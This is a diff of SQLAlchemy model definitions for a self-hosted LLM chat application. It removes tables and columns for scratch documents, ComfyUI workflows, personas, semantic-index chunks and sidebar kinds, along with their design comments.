exit_status: Mapped[int | None] = mapped_column(Integer)
|
||||
finished_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Job {self.id} {self.status}>"
|
||||
|
||||
|
||||
__all__ = ["AUTH_KEY", "AUTH_METHODS", "AUTH_PASSWORD", "Job", "SshProfile"]
|
||||
__all__ = ["AUTH_KEY", "AUTH_METHODS", "AUTH_PASSWORD", "SshProfile"]
|
||||
|
||||
@@ -1,50 +0,0 @@
|
||||
"""A chat's own working surface."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from sqlalchemy import ForeignKey, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
from lembas.db.models.library import AUTHOR_USER
|
||||
|
||||
|
||||
class ScratchDoc(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""A text artefact belonging to one chat, written by either side of it.
|
||||
|
||||
The model can write into it, the person can edit it, and either can hand the
|
||||
result to the next message as an ordinary attachment. Distinct from a note,
|
||||
which is a durable artefact of the reader's that outlives the chat -- this
|
||||
is the chat's own record of what it is working on, which is the same line
|
||||
`plan_update` is on rather than `notes_edit`.
|
||||
|
||||
A separate table rather than a column on `chats` for one plain reason:
|
||||
`select(Chat)` runs for the sidebar on every page load, and SQLAlchemy loads
|
||||
every column -- so a Text body would ride along with two hundred sidebar
|
||||
rows to answer a question about none of them.
|
||||
|
||||
One per chat. Several would mean a picker, names, deletion and a sweep, and
|
||||
would mean the model choosing an id; one means `scratch:<chat_id>` is
|
||||
derivable rather than looked up. If several are ever wanted, they are notes.
|
||||
"""
|
||||
|
||||
__tablename__ = "scratch_docs"
|
||||
|
||||
chat_id: Mapped[str] = mapped_column(
|
||||
String(32),
|
||||
ForeignKey("chats.id", ondelete="CASCADE"),
|
||||
nullable=False,
|
||||
index=True,
|
||||
unique=True,
|
||||
)
|
||||
user_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
title: Mapped[str] = mapped_column(String(300), default="Scratch")
|
||||
body: Mapped[str] = mapped_column(Text, default="")
|
||||
# Who wrote it last, so the panel can say. Not authorisation: the chat's
|
||||
# owner is the only person who can reach it either way.
|
||||
author: Mapped[str] = mapped_column(String(16), default=AUTHOR_USER, nullable=False)
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<ScratchDoc {self.chat_id}>"
|
||||
@@ -26,28 +26,8 @@ ROLE_TOOL = "tool"
|
||||
# chat is pointed at a machine before it starts and stays pointed there.
|
||||
KIND_CHAT = "chat"
|
||||
KIND_AGENT = "agent"
|
||||
|
||||
# The two sides of the sidebar's Chat/Agent switch, and nothing else.
|
||||
# `KINDS` must NOT grow: `api/preferences.py:set_sidebar_kind` validates against
|
||||
# it, so a third entry would make the tree filterable to a side with no button
|
||||
# to leave it -- the "one side of a fork nobody can move" failure the
|
||||
# `sidebar_split` guard already exists to prevent.
|
||||
KINDS = (KIND_CHAT, KIND_AGENT)
|
||||
|
||||
# Conversations that belong to a section of their own rather than to the tree.
|
||||
# A Messages conversation is one per person; a task chat belongs to a schedule
|
||||
# and is reached through Scheduled. Neither is ever listed among the chats, so
|
||||
# neither is a side of the switch.
|
||||
KIND_MESSAGES = "messages"
|
||||
KIND_TASK = "task"
|
||||
|
||||
# What a row's `kind` may actually be. Every listing that means "the sidebar
|
||||
# tree" filters on KINDS; every check that means "is this a real value" uses
|
||||
# this. Reading `kind == ""` as "no filter" is what leaks a task chat into the
|
||||
# ordinary list on an instance with agents switched off, where the sidebar
|
||||
# passes "" precisely because there is no switch to read.
|
||||
ALL_KINDS = (*KINDS, KIND_MESSAGES, KIND_TASK)
|
||||
|
||||
# Duplicated from services/agent/policy.py rather than imported: a model module
|
||||
# importing a service would invert the dependency, and this is only the column
|
||||
# default. policy.MODES is the vocabulary; this is what a row starts as.
|
||||
@@ -69,28 +49,6 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
|
||||
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
collapsed: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
|
||||
# What chats started in this folder inherit. A folder is where somebody
|
||||
# groups the work on one thing, so it is the natural place to say "chats
|
||||
# about this use this prompt, this model, this machine" -- said once rather
|
||||
# than on every new chat.
|
||||
description: Mapped[str] = mapped_column(String(500), default="")
|
||||
# Read at request time, never copied onto the chat: editing the folder later
|
||||
# has to reach the chats already in it, which is the whole point of putting
|
||||
# it here. It slots into the ladder between the chat and the model.
|
||||
system_prompt: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
# Seeds, copied onto a new chat and then that chat's own. Empty means "no
|
||||
# opinion", so a folder can carry a prompt without also dictating a model.
|
||||
model_id: Mapped[str] = mapped_column(String(300), default="")
|
||||
kind: Mapped[str] = mapped_column(String(16), default="")
|
||||
# Deliberately not a ForeignKey. `migrations.py` compiles the column type
|
||||
# only, so a REFERENCES clause would exist on a fresh database and not on an
|
||||
# upgraded one -- the same reason `Chat.compacted_through_id` is a plain id.
|
||||
# The profile may also have been deleted, so it is validated on read.
|
||||
ssh_profile_id: Mapped[str] = mapped_column(String(32), default="")
|
||||
project_dir: Mapped[str] = mapped_column(String(1000), default="")
|
||||
agent_mode: Mapped[str] = mapped_column(String(16), default="")
|
||||
|
||||
children: Mapped[list[Folder]] = relationship(
|
||||
back_populates="parent",
|
||||
cascade="all, delete-orphan",
|
||||
@@ -99,7 +57,8 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
|
||||
parent: Mapped[Folder | None] = relationship(back_populates="children", remote_side="Folder.id")
|
||||
chats: Mapped[list[Chat]] = relationship(back_populates="folder")
|
||||
|
||||
def visible_chats(self, kind: str = "") -> list[Chat]:
|
||||
@property
|
||||
def visible_chats(self) -> list[Chat]:
|
||||
"""The chats in this folder that belong in the sidebar.
|
||||
|
||||
The relationship itself stays unfiltered -- back-population needs every
|
||||
@@ -109,58 +68,13 @@ class Folder(UUIDPrimaryKey, Timestamps, Base):
|
||||
existed. The unfiled list has always filtered them (api/pages.py); the
|
||||
folder branch went through the relationship and filtered nothing.
|
||||
|
||||
`kind` narrows to one side of the sidebar's Chat/Agent switch. Empty
|
||||
means *both sides of the switch* -- which is not the same as "no filter",
|
||||
and the difference only became visible once a third kind existed. An
|
||||
instance with agents disabled passes "" because there is no switch to
|
||||
read, so a bare `not kind` would list every task chat and the Messages
|
||||
conversation among somebody's ordinary chats. Those have sections of
|
||||
their own and are never in the tree.
|
||||
|
||||
Ordered like the unfiled list: pinned first, then most recently touched.
|
||||
"""
|
||||
wanted = (kind,) if kind else KINDS
|
||||
kept = [
|
||||
chat
|
||||
for chat in self.chats
|
||||
if not chat.archived and not chat.temporary and chat.kind in wanted
|
||||
]
|
||||
kept = [chat for chat in self.chats if not chat.archived and not chat.temporary]
|
||||
kept.sort(key=lambda chat: chat.updated_at, reverse=True)
|
||||
kept.sort(key=lambda chat: not chat.pinned)
|
||||
return kept
|
||||
|
||||
def visible_children(self, kind: str = "") -> list[Folder]:
|
||||
"""Sub-folders the sidebar should show on this side of the switch.
|
||||
|
||||
Here rather than in the template because Jinja's `selectattr` names a
|
||||
test, it does not call a method -- so the filter would have to be spelled
|
||||
out as a loop appending to a list, in a template that already includes
|
||||
itself recursively.
|
||||
"""
|
||||
return [child for child in self.children if child.shown_in(kind)]
|
||||
|
||||
def holds(self, kind: str = "") -> bool:
|
||||
"""Whether anything of this kind is anywhere under this folder.
|
||||
|
||||
Recursive, because a folder's only matching chat may be three levels
|
||||
down and judging on its own contents alone would bury it.
|
||||
"""
|
||||
if self.visible_chats(kind):
|
||||
return True
|
||||
return any(child.holds(kind) for child in self.children)
|
||||
|
||||
def shown_in(self, kind: str = "") -> bool:
|
||||
"""Whether this folder belongs on one side of the sidebar's switch.
|
||||
|
||||
Two different reasons a folder can have nothing in it, and only one of
|
||||
them is a reason to hide it. A folder full of ordinary chats is noise on
|
||||
the Agent side and is dropped. A folder that is empty of *everything* is
|
||||
a container somebody just made and has not filled yet -- hiding that one
|
||||
means it can never be found again, let alone filed into, so it shows on
|
||||
both sides and says "Empty" for itself.
|
||||
"""
|
||||
return self.holds(kind) or not self.holds()
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Folder {self.name}>"
|
||||
|
||||
@@ -230,59 +144,6 @@ class Chat(UUIDPrimaryKey, Timestamps, Base):
|
||||
# somebody's real working tree and deleting their work would be far worse
|
||||
# than an inconsistency -- so the harness says so instead.
|
||||
rewound_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
# Which message carries the plan currently in force. A plain id and not a
|
||||
# ForeignKey, for the reason `compacted_through_id` below gives; validated
|
||||
# on read. It exists so the harness can put the plan in front of the model
|
||||
# with one `db.get` by primary key rather than a scan for "the newest
|
||||
# message with a plan" -- `context_variables` is synchronous and on the
|
||||
# request path. A plan a model cannot see is a plan it cannot keep current.
|
||||
plan_message_id: Mapped[str | None] = mapped_column(String(32))
|
||||
# What this chat has switched off, narrowing what it is already allowed.
|
||||
# {"families": {"web_search": false}, "skills": {"weekly-report": false}}.
|
||||
# **Absent means on**, for every key -- the same convention
|
||||
# `McpServer.tool_overrides_json` uses, and for the same reason: two
|
||||
# representations of "on" makes "why is this off?" unanswerable.
|
||||
scope_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# What this chat generates pictures with when the model names neither. A
|
||||
# preference rather than a constraint -- the model may still choose another
|
||||
# template or checkpoint for a particular image, and the harness lists what
|
||||
# is on offer -- so this is where "in this chat I am working in SDXL" is
|
||||
# said once instead of in every prompt.
|
||||
#
|
||||
# Plain columns rather than keys in `scope_json`: that one narrows what a
|
||||
# chat may *reach* and absent means on, which is the opposite of what an
|
||||
# empty default here means. A workflow that has since been deleted reads
|
||||
# back as no preference, so it is validated on use like `ssh_profile_id`.
|
||||
image_workflow_id: Mapped[str | None] = mapped_column(String(32))
|
||||
image_checkpoint: Mapped[str] = mapped_column(String(300), default="")
|
||||
|
||||
# --- Subagents -----------------------------------------------------------
|
||||
# The chat whose reply spawned this one, when a model delegated a piece of
|
||||
# work. A plain id and not a ForeignKey, for the reason the three above
|
||||
# give, and validated on read. Its presence is what makes a chat a
|
||||
# subagent's: `agent/session.py` sizes it smaller, `services/subagent.py`
|
||||
# refuses to spawn from one, and the sweep finds it.
|
||||
parent_chat_id: Mapped[str | None] = mapped_column(String(32))
|
||||
# Nobody is at the keyboard for this conversation, and nothing in it may
|
||||
# stop to ask. Not the same question as `kind`: a scheduled task's chat is
|
||||
# unattended because of what started it, a subagent's because of what it is,
|
||||
# and a future third thing will be unattended for a third reason. Reading
|
||||
# the flag rather than the kind is what stops each of those needing its own
|
||||
# branch in `resolve_tools` and in `_authorise`.
|
||||
unattended: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
|
||||
# Which files are open in the canvas panel, and which of them is in front.
|
||||
# {"tabs": [{"key": "agent:/srv/app/main.py", "title": …, "source": …}],
|
||||
# "active": "agent:/srv/app/main.py"}
|
||||
#
|
||||
# Server-side rather than in the browser because a model reading a file
|
||||
# opens a tab, and every frame this application streams is HTML swapped
|
||||
# whole -- if the browser owned the list, the server could not render the
|
||||
# strip and the frame would have to become data for JavaScript to interpret.
|
||||
# One chat, one canvas, the same consequence the terminal panel documents:
|
||||
# two tabs on the same chat share it.
|
||||
canvas_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# --- Compaction ----------------------------------------------------------
|
||||
# A summary of the turns up to `compacted_through_id`, sent in their place.
|
||||
@@ -347,28 +208,11 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
|
||||
# answer stay visible, and deliberately NOT replayed as context on the next
|
||||
# turn -- see services/generation.py for why.
|
||||
tool_calls_json: Mapped[list[Any]] = mapped_column(JSONList, default=list)
|
||||
|
||||
# Where each round's contribution ended, so `content`, `reasoning` and
|
||||
# `tool_calls_json` can be shown as the one sequence they actually were
|
||||
# rather than as three stacked zones. One entry per closed step, holding the
|
||||
# cumulative length of each of the three at that moment. See
|
||||
# services/steps.py; read it through the `steps` property below.
|
||||
#
|
||||
# Nullable, and that is load-bearing rather than lazy. `migrations.py`
|
||||
# derives a backfill for a NOT NULL column from `column.type.python_type`,
|
||||
# and `JSONList` is `MutableList.as_mutable(JSON)` whose `python_type` is
|
||||
# `dict` -- so a NOT NULL list column would be backfilled `'{}'` on every
|
||||
# existing row and fail on the first read. Nullable means no default, which
|
||||
# is what an older row should have anyway: no marks, and the old layout.
|
||||
steps_json: Mapped[list[Any] | None] = mapped_column(JSONList, nullable=True, default=list)
|
||||
|
||||
usage_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# A plan produced in Plan mode, or the state of one being carried out. See
|
||||
# services/plans.py for the shape. Marked on the row rather than parsed back
|
||||
# out of the prose, so the Execute button sends exactly what was proposed
|
||||
# and not an approximation of it. Read through the `plan` property below,
|
||||
# never directly: rows written before version 2 hold `{title, steps}`.
|
||||
# A plan produced in Plan mode: {"title": str, "steps": [str, ...]}. Marked
|
||||
# on the row rather than parsed back out of the prose, so the Execute button
|
||||
# sends exactly what was proposed and not an approximation of it.
|
||||
plan_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# Non-empty when generation failed. Rendered as a styled error in the
|
||||
@@ -387,16 +231,6 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
|
||||
# of tool calls -- is the only thing that clears it.
|
||||
queued: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
|
||||
# Written by the application rather than by the person whose bubble this
|
||||
# would otherwise be. `agent/jobs.py:wake` is the one writer: a background
|
||||
# job finishing is a new turn in the *user* role, and that role is
|
||||
# load-bearing -- `_inject` sends a queued turn verbatim and `build_messages`
|
||||
# has to keep seeing a user turn -- but it is not the reader speaking, and
|
||||
# rendering it under their name with their initial beside it is the
|
||||
# application putting words in their mouth. Nothing about the request
|
||||
# changes; only the bubble does.
|
||||
machine: Mapped[bool] = mapped_column(Boolean, default=False, nullable=False)
|
||||
|
||||
chat: Mapped[Chat] = relationship(back_populates="messages")
|
||||
attachments: Mapped[list[Attachment]] = relationship( # noqa: F821
|
||||
back_populates="message",
|
||||
@@ -412,18 +246,5 @@ class Message(UUIDPrimaryKey, Timestamps, Base):
|
||||
def documents(self) -> list:
|
||||
return [a for a in self.attachments if not a.is_image]
|
||||
|
||||
@property
|
||||
def plan(self) -> dict:
|
||||
"""The plan, always in the current shape.
|
||||
|
||||
A property for the reason `images` and `documents` are: a message bubble
|
||||
is rendered from four different handlers, and every one of them would
|
||||
otherwise have to remember to normalise. Rows written before version 2
|
||||
hold `{title, steps}` and come back through here as one phase.
|
||||
"""
|
||||
from lembas.services import plans
|
||||
|
||||
return plans.normalise(self.plan_json)
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Message {self.role} {self.content[:40]!r}>"
|
||||
|
||||
@@ -19,7 +19,7 @@ from sqlalchemy import (
|
||||
from sqlalchemy.orm import Mapped, mapped_column, relationship
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
from lembas.db.types import JSONDict, JSONList
|
||||
from lembas.db.types import JSONDict
|
||||
|
||||
if TYPE_CHECKING:
|
||||
# Import only for the annotation; at runtime SQLAlchemy resolves the
|
||||
@@ -58,18 +58,6 @@ class Connection(UUIDPrimaryKey, Timestamps, Base):
|
||||
# Extra headers merged into every request (e.g. OpenRouter's HTTP-Referer).
|
||||
extra_headers_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
# How to ask this endpoint to drop its model from memory, for the Preserve
|
||||
# VRAM option in image generation. Per connection and not instance-wide,
|
||||
# because the VRAM being freed is a particular machine's: llama-swap on this
|
||||
# host answers `GET /unload`, while a remote vLLM has no such call and no
|
||||
# reason to be unloaded when ComfyUI needs memory *here*.
|
||||
#
|
||||
# Empty means "this connection cannot be unloaded", which is the honest
|
||||
# default -- there is no call that works everywhere, and guessing one would
|
||||
# send an unexplained request to somebody's endpoint.
|
||||
unload_url: Mapped[str] = mapped_column(String(500), default="")
|
||||
unload_method: Mapped[str] = mapped_column(String(8), default="POST")
|
||||
|
||||
# Result of the most recent "Test & refresh", surfaced in the admin list.
|
||||
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
last_error: Mapped[str] = mapped_column(Text, default="")
|
||||
@@ -101,16 +89,6 @@ class Model(UUIDPrimaryKey, Timestamps, Base):
|
||||
model_id: Mapped[str] = mapped_column(String(300), nullable=False)
|
||||
display_name: Mapped[str] = mapped_column(String(300), default="")
|
||||
description: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
# What the *other* models are told about this one, when the roster is in
|
||||
# front of them. Separate from `description`, which is written for people
|
||||
# and reads like marketing; this is meant to be facts -- parameters,
|
||||
# quantisation, a benchmark figure, what it is bad at.
|
||||
#
|
||||
# A column and not a key in `capabilities_json`, for the reason
|
||||
# `context_length` and `reasoning_efforts` both carry: that dict is rebuilt
|
||||
# wholesale from the submitted checkboxes on every save.
|
||||
notes: Mapped[str] = mapped_column(Text, default="")
|
||||
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
|
||||
|
||||
# Sort order in every picker. Ties fall back to model_id so the order is
|
||||
@@ -147,20 +125,6 @@ class Model(UUIDPrimaryKey, Timestamps, Base):
|
||||
# ticked anything.
|
||||
context_length: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
|
||||
# Which reasoning efforts this model actually accepts. Empty means "nobody
|
||||
# has said", and `services/chat.efforts_for` answers with the common set.
|
||||
#
|
||||
# It has to be per model, because the vocabulary is: gpt-oss takes
|
||||
# low/medium/high, Bonsai takes low/medium/xhigh and *raises* on high, and
|
||||
# OpenAI's own list has grown minimal, xhigh and max at different times. A
|
||||
# single global tuple is a guess that is wrong for somebody.
|
||||
#
|
||||
# ⚠ A column and not a key in `capabilities_json`, for exactly the reason
|
||||
# `context_length` is one: that dict is rebuilt wholesale from the submitted
|
||||
# checkboxes on every save, so anything in it that is not a checkbox is
|
||||
# destroyed the next time an administrator ticks anything.
|
||||
reasoning_efforts: Mapped[list[str]] = mapped_column(JSONList, default=list)
|
||||
|
||||
connection: Mapped[Connection] = relationship(back_populates="models")
|
||||
groups: Mapped[list[Group]] = relationship(
|
||||
"Group", secondary=model_groups, back_populates="models"
|
||||
|
||||
@@ -1,60 +0,0 @@
|
||||
"""ComfyUI workflow templates an administrator saved.
|
||||
|
||||
A table rather than a list inside the settings group, for the reason
|
||||
`McpServer.tools_json` is *not* a table: that one is a cache of somebody else's
|
||||
document, replaced wholesale on every refresh, where each entry carries one
|
||||
decision. These are the opposite -- authored by hand, individually named,
|
||||
edited, reordered and deleted, and referenced by id from a chat. Everything a
|
||||
table gives for free is exactly what is wanted.
|
||||
|
||||
Deliberately **no group access list**, unlike `CustomTool`. The whole feature is
|
||||
already behind one capability flag and one permission; a second access system
|
||||
covering which templates a person may pick would be a screen of checkboxes
|
||||
nobody asked for, and the thing being restricted is the shape of a picture.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from datetime import datetime
|
||||
from typing import Any
|
||||
|
||||
from sqlalchemy import Boolean, DateTime, Integer, String, Text
|
||||
from sqlalchemy.orm import Mapped, mapped_column
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
from lembas.db.types import JSONDict
|
||||
|
||||
|
||||
class ImageWorkflow(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""One API-format ComfyUI workflow, with holes where the values go."""
|
||||
|
||||
__tablename__ = "image_workflows"
|
||||
|
||||
# What the *model* names when it picks this one, so it is short and
|
||||
# lowercase for the same reason a tool's slug is: it lands in a schema enum
|
||||
# and is generated by something that spells inconsistently.
|
||||
slug: Mapped[str] = mapped_column(String(64), unique=True, nullable=False)
|
||||
name: Mapped[str] = mapped_column(String(120), nullable=False)
|
||||
|
||||
# Sent to the model beside the slug, and the only thing it has to choose
|
||||
# with. "Photographic, SDXL, slow" is a choice; "workflow 2" is not.
|
||||
description: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
# The workflow itself, in ComfyUI's API format, with `{{placeholders}}`
|
||||
# where the parameters go. Stored parsed rather than as text so the admin
|
||||
# form can only ever save something that is valid JSON -- a template that
|
||||
# does not parse would fail at generation time, minutes later, in front of
|
||||
# somebody who was not editing it.
|
||||
workflow_json: Mapped[dict[str, Any]] = mapped_column(JSONDict, default=dict)
|
||||
|
||||
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
|
||||
position: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
|
||||
# The result of the last time somebody pressed Test, in the shape
|
||||
# `CustomTool` and `McpServer` already use, so the row reads the same way in
|
||||
# the list as theirs do.
|
||||
last_checked_at: Mapped[datetime | None] = mapped_column(DateTime(timezone=True))
|
||||
last_error: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<ImageWorkflow {self.slug}>"
|
||||
@@ -29,7 +29,6 @@ from sqlalchemy import (
|
||||
ForeignKey,
|
||||
Index,
|
||||
Integer,
|
||||
LargeBinary,
|
||||
String,
|
||||
Table,
|
||||
Text,
|
||||
@@ -53,13 +52,6 @@ SOURCE_LINK = "link"
|
||||
RESOURCE_BASE = "base"
|
||||
RESOURCE_NOTE = "note"
|
||||
RESOURCE_SKILL = "skill"
|
||||
# A report is shareable and a memory is not, and the line between them is the
|
||||
# one already drawn elsewhere: a finished piece of work is exactly the thing
|
||||
# somebody wants to hand over, and a record *about a person* is not content to
|
||||
# pass round. The constant lives here beside the other three even though Report
|
||||
# is not a library model, because `Share.resource_type` is one column and its
|
||||
# vocabulary belongs in one place.
|
||||
RESOURCE_REPORT = "report"
|
||||
|
||||
PRINCIPAL_USER = "user"
|
||||
PRINCIPAL_GROUP = "group"
|
||||
@@ -294,69 +286,3 @@ class Share(UUIDPrimaryKey, Timestamps, Base):
|
||||
|
||||
Index("ix_shares_resource", Share.resource_type, Share.resource_id)
|
||||
Index("ix_shares_principal", Share.principal_type, Share.principal_id)
|
||||
|
||||
|
||||
# --- Semantic index -----------------------------------------------------------
|
||||
# What a chunk belongs to. Strings rather than a foreign key per store, because
|
||||
# one table serving four of them is what stops the chunking, the scoring and the
|
||||
# rebuild being written four times and drifting three ways.
|
||||
CHUNK_DOCUMENT = "document"
|
||||
CHUNK_NOTE = "note"
|
||||
CHUNK_SKILL = "skill"
|
||||
CHUNK_REPORT = "report"
|
||||
|
||||
CHUNK_KINDS = (CHUNK_DOCUMENT, CHUNK_NOTE, CHUNK_SKILL, CHUNK_REPORT)
|
||||
|
||||
|
||||
class Chunk(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""A piece of one library record, and its embedding.
|
||||
|
||||
**Additive, so `sync_schema` creates it at startup with no manual step**, and
|
||||
absent-means-nothing: an instance with no embedding model chosen never writes
|
||||
a row here and the search behaves exactly as it always did.
|
||||
|
||||
`owner_id` is denormalised off the resource. It is not used for
|
||||
authorisation -- `services/sharing.py` is still the only definition of who
|
||||
may see what, and scoring happens before that filter exactly as the
|
||||
full-text path does -- but it is what makes "rebuild this person's index"
|
||||
and "drop everything of theirs" one indexed query rather than four joins.
|
||||
|
||||
No foreign key on `resource_id`, for the reason `Share.principal_id` has
|
||||
none: the column points at one of four tables depending on `resource_type`,
|
||||
which SQLite cannot express. `indexing.forget_resource` deletes the rows.
|
||||
"""
|
||||
|
||||
__tablename__ = "chunks"
|
||||
|
||||
owner_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
resource_type: Mapped[str] = mapped_column(String(16), nullable=False)
|
||||
resource_id: Mapped[str] = mapped_column(String(32), nullable=False)
|
||||
# Where in the record this piece came from, so a set can be rebuilt in order
|
||||
# and a hit can say which part matched.
|
||||
ordinal: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
text: Mapped[str] = mapped_column(Text, default="")
|
||||
|
||||
# float32, little-endian, packed. A BLOB rather than JSON because a 1024
|
||||
# dimension vector is 4KB packed and about 20KB as text, and every one of
|
||||
# them is read on every semantic search.
|
||||
vector: Mapped[bytes] = mapped_column(LargeBinary, nullable=False)
|
||||
# How many floats are in it. Stored rather than derived from the length so a
|
||||
# mismatch is a comparison this code refuses rather than one it gets wrong:
|
||||
# changing the embedding model changes the space, and vectors from two
|
||||
# spaces score against each other perfectly happily and mean nothing.
|
||||
dims: Mapped[int] = mapped_column(Integer, default=0, nullable=False)
|
||||
# Which model wrote it, for the same reason. A rebuild is what reconciles
|
||||
# them; until then the odd ones out are ignored rather than trusted.
|
||||
model_id: Mapped[str] = mapped_column(String(300), default="")
|
||||
# A hash of the text this set was built from. What makes re-indexing an
|
||||
# unchanged record free, and what makes "is this index current?" answerable
|
||||
# without re-embedding anything.
|
||||
source_hash: Mapped[str] = mapped_column(String(64), default="")
|
||||
|
||||
def __repr__(self) -> str:
|
||||
return f"<Chunk {self.resource_type}:{self.resource_id}#{self.ordinal}>"
|
||||
|
||||
|
||||
Index("ix_chunks_resource", Chunk.resource_type, Chunk.resource_id)
|
||||
|
||||
@@ -1,96 +0,0 @@
|
||||
"""Who a model is, and what it has made of the person it is talking to.
|
||||
|
||||
Two different things, one table, and the discriminator is a column:
|
||||
|
||||
* ``owner_id IS NULL`` -- the model's **persona**. Instance-wide, seeded by an
|
||||
administrator, and rewritten by the model itself when it is allowed to.
|
||||
* ``owner_id`` set -- that model's **read of that person**, kept as it goes.
|
||||
Per (model, person) rather than per model, because two models may honestly
|
||||
arrive at different views of the same somebody, and on an instance with more
|
||||
than one account nobody should inherit another person's reflection.
|
||||
|
||||
Why not a fourth prompt layer: because *"system prompts replace, never stack"*
|
||||
is a decision this project has already taken. Both of these reach the model as
|
||||
``{{persona}}`` and ``{{person_view}}``, through ordinary fragments, exactly the
|
||||
way the memories block does.
|
||||
|
||||
⚠ **``model_key`` is the model's text id, not the ``Model`` row's primary key**,
|
||||
and there is deliberately no foreign key to ``models``. "Test & refresh" on the
|
||||
connection screen deletes any model the endpoint no longer lists and recreates
|
||||
it when it comes back -- so a row keyed on the primary key would lose a model's
|
||||
whole personality to a refresh taken while its endpoint happened to be loading
|
||||
something else. This is the reasoning ``Chat.model_id`` already carries: the
|
||||
text id survives, and a row naming a model that no longer exists is invisible
|
||||
rather than broken.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from sqlalchemy import Boolean, ForeignKey, String, Text, UniqueConstraint
|
||||
from sqlalchemy.orm import Mapped, mapped_column, relationship
|
||||
|
||||
from lembas.db.base import Base, Timestamps, UUIDPrimaryKey
|
||||
from lembas.db.models.library import AUTHOR_MODEL, AUTHOR_USER
|
||||
|
||||
|
||||
class Persona(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""One model's personality, or one model's read of one person."""
|
||||
|
||||
__tablename__ = "personas"
|
||||
__table_args__ = (UniqueConstraint("model_key", "owner_id"),)
|
||||
|
||||
# The model's `model_id`, not a `models.id`. See the module docstring.
|
||||
model_key: Mapped[str] = mapped_column(String(300), nullable=False, index=True)
|
||||
|
||||
# NULL means "this is the model's own persona". Set means "this is what that
|
||||
# model makes of this person".
|
||||
owner_id: Mapped[str | None] = mapped_column(
|
||||
String(32), ForeignKey("users.id", ondelete="CASCADE"), nullable=True, index=True
|
||||
)
|
||||
|
||||
content: Mapped[str] = mapped_column(Text, default="")
|
||||
# Who wrote what is in `content` now. A person reading their own reflection
|
||||
# is entitled to know which of the two put each version there.
|
||||
author: Mapped[str] = mapped_column(String(16), default=AUTHOR_MODEL, nullable=False)
|
||||
# Switched off rather than deleted, so turning it off does not throw the text
|
||||
# away and turning it back on does not need it retyped.
|
||||
enabled: Mapped[bool] = mapped_column(Boolean, default=True, nullable=False)
|
||||
|
||||
revisions: Mapped[list[PersonaRevision]] = relationship(
|
||||
back_populates="persona",
|
||||
cascade="all, delete-orphan",
|
||||
order_by="PersonaRevision.created_at.desc()",
|
||||
)
|
||||
|
||||
@property
|
||||
def is_reflection(self) -> bool:
|
||||
return self.owner_id is not None
|
||||
|
||||
def __repr__(self) -> str:
|
||||
kind = "reflection" if self.is_reflection else "persona"
|
||||
return f"<Persona {kind} {self.model_key} {self.content[:30]!r}>"
|
||||
|
||||
|
||||
class PersonaRevision(UUIDPrimaryKey, Timestamps, Base):
|
||||
"""The state of a persona before a change.
|
||||
|
||||
The same safety story as `SkillRevision`, for the same reason and with the
|
||||
same limit stated plainly: a model that has just read a hostile page can
|
||||
rewrite its own personality, and what stops that being permanent is a record
|
||||
and a way back rather than a gate.
|
||||
"""
|
||||
|
||||
__tablename__ = "persona_revisions"
|
||||
|
||||
persona_id: Mapped[str] = mapped_column(
|
||||
String(32), ForeignKey("personas.id", ondelete="CASCADE"), nullable=False, index=True
|
||||
)
|
||||
content: Mapped[str] = mapped_column(Text, default="")
|
||||
# Who made the change this revision is the "before" of.
|
||||
author: Mapped[str] = mapped_column(String(16), default=AUTHOR_USER, nullable=False)
|
||||
note: Mapped[str] = mapped_column(String(200), default="")
|
||||
|
||||
persona: Mapped[Persona] = relationship(back_populates="revisions")
|
||||
|
||||
|
||||
__all__ = ["AUTHOR_MODEL", "AUTHOR_USER", "Persona", "PersonaRevision"]
|
||||
@@ -1,75 +0,0 @@
|
||||
"""Reports: what was found, written down once and never replied to."""
|
||||
